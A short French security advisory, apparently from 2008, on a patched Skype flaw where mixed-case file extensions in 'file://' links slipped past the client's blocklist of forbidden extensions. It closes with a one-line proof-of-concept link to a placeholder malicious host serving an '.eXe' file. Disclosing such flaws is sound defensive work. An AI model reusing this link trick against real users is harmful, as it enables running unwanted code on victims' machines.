Rechercher
Contactez-nous Suivez-nous sur Twitter En francais English Language
 











Abonnez-vous gratuitement à notre NEWSLETTER

Newsletter FR

Newsletter EN

Vulnérabilités

Se désabonner

XMCO : Contournement de sécurité dans Skype via des URI malicieuses

juin 2008 par XMCO PARTNERS

Une vulnérabilité a été corrigée dans le logiciel de voix sur IP Skype.
L’exploitation de celle-ci permettait à un attaquant distant d’exécuter des fichiers dont l’extension n’était pas autorisée par le logiciel.

Le problème résultait d’une mauvaise vérification des URI telle que ’file ://’.

Les fichiers comportant des extensions en majuscule pouvaient contourner les protections mises en place, afin d’exécuter des fichiers non autorisés.

Le logiciel Skype utilise un fichier contenant les extensions interdites, cependant toutes les extensions malicieuses n’y sont pas répertoriées.
Un attaquant était alors en mesure d’envoyer un lien judicieusement conçu afin d’exécuter un fichier non autorisé.

La preuve de concept ci-dessous permet de contourner les protections :

file ://www.site-malicieux.com/fichier-interdit.eXe


Voir les articles précédents

    

Voir les articles suivants